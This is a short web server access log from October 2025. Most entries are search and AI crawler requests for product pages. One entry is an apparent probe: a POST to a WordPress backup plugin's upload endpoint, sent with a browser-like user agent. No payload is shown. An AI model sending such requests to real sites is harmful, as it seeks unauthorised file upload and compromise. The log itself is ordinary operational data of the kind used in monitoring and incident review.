66.249.64.105 - - [18/Oct/2025:16:15:53 -0400] "GET /categories/12132804 HTTP/1.1" 200 29335 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:16:16:07 -0400] "GET /products4916018?kg=0004856148 HTTP/1.1" 200 28930 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:16:16:52 -0400] "POST /wp-cron.php?doing_wp_cron=1760818612.4682450294494628906250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:16:17:02 -0400] "GET /products7231120?kg=0007143017 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
5.39.1.230 - - [18/Oct/2025:16:16:47 -0400] "GET /products14567988?kg=0014390411 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.159 - - [18/Oct/2025:16:16:58 -0400] "GET /products199386822?kg=0196955358 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:16:17:04 -0400] "GET /products60886836?kg=0060144395 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:16:17:11 -0400] "POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.17"
216.73.216.159 - - [18/Oct/2025:16:17:08 -0400] "GET /products235660816?kg=0232786985 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:17:30 -0400] "GET /products188475606?kg=0186177206 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:17:38 -0400] "GET /products148421016?kg=0146611085 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:17:50 -0400] "GET /products129179602?kg=0127604324 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
